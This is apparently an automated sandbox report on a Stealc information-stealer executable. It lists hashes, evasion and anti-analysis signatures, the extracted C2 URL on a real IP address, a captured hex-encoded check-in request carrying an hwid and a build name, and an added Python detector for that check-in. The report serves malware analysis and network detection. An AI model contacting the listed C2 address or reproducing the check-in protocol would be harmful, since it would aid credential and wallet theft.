

Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1558834
MD5: d90a0fa7d1b136c6aaa035f6bc5602fa
SHA1: 1e236ca8b781f344a4738c1810b3c819ec72fac5
SHA256: 136dfe4a8f2801c7836bb2518b2eb57142e57efb77a665830a00335fdfe0c2bd
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5940 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D90A0FA7D1B136C6AAA035F6BC5602FA)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2116004330.0000000005160000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 5940 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 5940 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-19T21:02:10.401141+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: file.exe.5940.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B9B80 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJEC
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 32 44 31 42 45 38 37 35 41 37 34 31 36 38 38 36 39 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 2d 2d 0d 0a
    Data Ascii:
        ------AKJEGCFBGDHJJJJJKJEC
        Content-Disposition: form-data; name="hwid"

        112D1BE875A74168869055
        ------AKJEGCFBGDHJJJJJKJEC
        Content-Disposition: form-data; name="build"

        mars
        ------AKJEGCFBGDHJJJJJKJEC--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy
Source: unknown | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 (same request line, headers and body as the global-traffic POST listed above)
Source: file.exe, 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php3
Source: file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpo
Source: file.exe, 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.2067
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop
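The request the Suricata rule fired on is a small, fixed-shape check-in: a POST to a 16-hex-digit .php path, no User-Agent, and a multipart body that carries nothing but an hwid and a build name (here "mars", the same value the configuration extractor reports as "Botnet"). The Python below is an added example for this page, not code from Joe Sandbox or from the Stealc authors. The headers and body are re-typed from the captured request above; the multipart parser handles only plain field parts (no file uploads or nested parts); and the path pattern and the three-indicator rule are assumptions generalised from this one sample, not the text of ET rule 2044243.

```python
import re

# Check-in captured in this report, re-typed from the sandbox's HTTP dump
# (the raw hex listing above decodes to exactly these 211 bytes).
BOUNDARY = "----AKJEGCFBGDHJJJJJKJEC"
CAPTURED_METHOD, CAPTURED_PATH = "POST", "/c4becf79229cb002.php"
CAPTURED_HEADERS = {
    "Content-Type": "multipart/form-data; boundary=" + BOUNDARY,
    "Host": "185.215.113.206",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}
CAPTURED_BODY = (
    b"------AKJEGCFBGDHJJJJJKJEC\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"112D1BE875A74168869055\r\n"
    b"------AKJEGCFBGDHJJJJJKJEC\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"mars\r\n"
    b"------AKJEGCFBGDHJJJJJKJEC--\r\n"
)

_NAME_RE = re.compile(rb'name="([^"]*)"')
# Assumption: the gate path shape seen in this sample is treated as a pattern.
_GATE_RE = re.compile(r"/[0-9a-f]{16}\.php")


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Minimal multipart/form-data parser: {field name: value as text}.
    Parts are separated by '--' + boundary; the closing delimiter carries
    an extra '--'. Only simple field parts are handled."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delimiter = b"--" + m.group(1).encode("ascii")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # closing delimiter, nothing follows
            break
        head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = _NAME_RE.search(head)
        if name:
            fields[name.group(1).decode("ascii")] = value.rstrip(b"\r\n").decode("latin-1")
    return fields


def checkin_indicators(method: str, path: str, headers: dict, body: bytes) -> list:
    """Return the indicators of a Stealc-style check-in present in a request."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    reasons = []
    if method == "POST" and _GATE_RE.fullmatch(path):
        reasons.append("POST to a 16-hex-digit .php gate")
    if "user-agent" not in hdrs:             # the report's 'HTTP GET or POST without a user agent'
        reasons.append("no User-Agent header")
    ctype = hdrs.get("content-type", "")
    if ctype.startswith("multipart/form-data"):
        fields = parse_multipart(body, ctype)
        if set(fields) == {"hwid", "build"}:
            reasons.append("multipart body is exactly hwid=%s build=%s" % (fields["hwid"], fields["build"]))
    return reasons


def is_stealc_checkin(method: str, path: str, headers: dict, body: bytes) -> bool:
    """All three indicators together; any one alone is common in benign traffic."""
    return len(checkin_indicators(method, path, headers, body)) == 3


if __name__ == "__main__":
    print(parse_multipart(CAPTURED_BODY, CAPTURED_HEADERS["Content-Type"]))
    for reason in checkin_indicators(CAPTURED_METHOD, CAPTURED_PATH, CAPTURED_HEADERS, CAPTURED_BODY):
        print("-", reason)
```

Feed it the method, path, header map and body of each request pulled from a proxy log or a pcap; the "no User-Agent" indicator alone also matches the initial GET / in this report, which is why the function only calls a request a check-in when all three indicators are present.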

System Summary

Source: file.exe | Static PE information: section name: (empty or whitespace-only name)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty or whitespace-only name)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF5897
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA90F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6B0DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D48B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B68855
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E46000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B611D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B70289
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B62A4B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6F34D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B664F8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4649D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5F597
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B695F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B71D1B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B29570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ACAD5B
